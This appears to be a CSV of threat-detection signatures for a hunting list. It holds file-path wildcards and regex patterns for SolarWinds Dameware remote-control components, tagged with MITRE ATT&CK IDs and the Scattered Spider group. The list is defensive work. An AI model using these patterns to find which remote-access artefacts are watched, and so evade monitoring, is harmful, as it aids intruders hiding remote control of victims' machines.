"*\dameware remote everywhere agent*",".{0,1000}\\dameware\sremote\severywhere\sagent.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\dameware remote everywhere.lnk*",".{0,1000}\\dameware\sremote\severywhere\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Dameware Remote Support .lnk*",".{0,1000}\\Dameware\sRemote\sSupport\s\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\Dameware Remote Support\*",".{0,1000}\\Dameware\sRemote\sSupport\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\DameWare.Diagnostics*",".{0,1000}\\DameWare\.Diagnostics.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DameWare.LogAdjuster.exe*",".{0,1000}\\DameWare\.LogAdjuster\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DameWare.LogAdjuster.exe.config*",".{0,1000}\\DameWare\.LogAdjuster\.exe\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\damewareagent.exe",".{0,1000}\\damewareagent\.exe","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\damewareagent.exe*",".{0,1000}\\damewareagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\damewareremoteeverywhere\*",".{0,1000}\\damewareremoteeverywhere\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\damewareremoteeverywhereagentinstaller.install.log*",".{0,1000}\\damewareremoteeverywhereagentinstaller\.install\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\disable dameware remote everywhere agent.lnk*",".{0,1000}\\disable\sdameware\sremote\severywhere\sagent\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\DMRC-10-Evaluation.lic*",".{0,1000}\\DMRC\-10\-Evaluation\.lic.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DNTU.exe*",".{0,1000}\\DNTU\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\dre_mac_console.zip*",".{0,1000}\\dre_mac_console\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\DWAMTD.dll*",".{0,1000}\\DWAMTD\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWAMTDRES.dll*",".{0,1000}\\DWAMTDRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWMRC_St_64.msi*",".{0,1000}\\DWMRC_St_64\.msi.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWMSISET.W32*",".{0,1000}\\DWMSISET\.W32.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWMSISET.X64*",".{0,1000}\\DWMSISET\.X64.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWNativeWCFClient.dll*",".{0,1000}\\DWNativeWCFClient\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWNativeWCFClientRES.dll*",".{0,1000}\\DWNativeWCFClientRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWPing.dll*",".{0,1000}\\DWPing\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWPINGRES.dll*",".{0,1000}\\DWPINGRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCBA.dll*",".{0,1000}\\DWRCBA\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCBN.dll*",".{0,1000}\\DWRCBN\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCC.chm*",".{0,1000}\\DWRCC\.chm.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCC.exe*",".{0,1000}\\DWRCC\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCC.log*",".{0,1000}\\DWRCC\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCC.log*",".{0,1000}\\DWRCC\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\DWRCC.Logging.xml*",".{0,1000}\\DWRCC\.Logging\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCCH.dll*",".{0,1000}\\DWRCCH\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCChat.dll*",".{0,1000}\\DWRCChat\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCChatRES.dll*",".{0,1000}\\DWRCChatRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCCMD.exe*",".{0,1000}\\DWRCCMD\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCCRES.dll*",".{0,1000}\\DWRCCRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCCSFTv2.data*",".{0,1000}\\DWRCCSFTv2\.data.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCD.dll*",".{0,1000}\\DWRCD\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCD.dll*",".{0,1000}\\DWRCD\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCK.dll*",".{0,1000}\\DWRCK\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCOP.dll*",".{0,1000}\\DWRCOP\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCOPRES.dll*",".{0,1000}\\DWRCOPRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCPN.dll*",".{0,1000}\\DWRCPN\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCRSA.dll*",".{0,1000}\\DWRCRSA\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCRSS.dll*",".{0,1000}\\DWRCRSS\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCRSS.dll*",".{0,1000}\\DWRCRSS\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCS.exe*",".{0,1000}\\DWRCS\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCS.Logging.xml*",".{0,1000}\\DWRCS\.Logging\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCS.reg*",".{0,1000}\\DWRCS\.reg.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSET.dll*",".{0,1000}\\DWRCSET\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSETRES.dll*",".{0,1000}\\DWRCSETRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSh.dll*",".{0,1000}\\DWRCSh\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSHRegister.cmd*",".{0,1000}\\DWRCSHRegister\.cmd.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSI.dll*",".{0,1000}\\DWRCSI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSI.dll*",".{0,1000}\\DWRCSI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSIRES.dll*",".{0,1000}\\DWRCSIRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSMSI.exe*",".{0,1000}\\DWRCSMSI\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSMSIRES.dll*",".{0,1000}\\DWRCSMSIRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSPC.exe*",".{0,1000}\\DWRCSPC\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSPCRES.dll*",".{0,1000}\\DWRCSPCRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSPX.exe*",".{0,1000}\\DWRCSPX\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSPXRES.dll*",".{0,1000}\\DWRCSPXRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSRES.dll*",".{0,1000}\\DWRCSRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCST.exe*",".{0,1000}\\DWRCST\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCST.Logging.xml*",".{0,1000}\\DWRCST\.Logging\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCSTRES.dll*",".{0,1000}\\DWRCSTRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCU3.dll*",".{0,1000}\\DWRCU3\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCWHD.Logging.xml*",".{0,1000}\\DWRCWHD\.Logging\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCWHDAPI.dll*",".{0,1000}\\DWRCWHDAPI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCWHDUI.dll*",".{0,1000}\\DWRCWHDUI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCWHDUIRES.dll*",".{0,1000}\\DWRCWHDUIRES\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCWol.dll*",".{0,1000}\\DWRCWol\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRCWXL.dll*",".{0,1000}\\DWRCWXL\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRTD.dll*",".{0,1000}\\DWRTD\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRTDE.exe*",".{0,1000}\\DWRTDE\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRTDR.dll*",".{0,1000}\\DWRTDR\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWRTDR.dll*",".{0,1000}\\DWRTDR\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
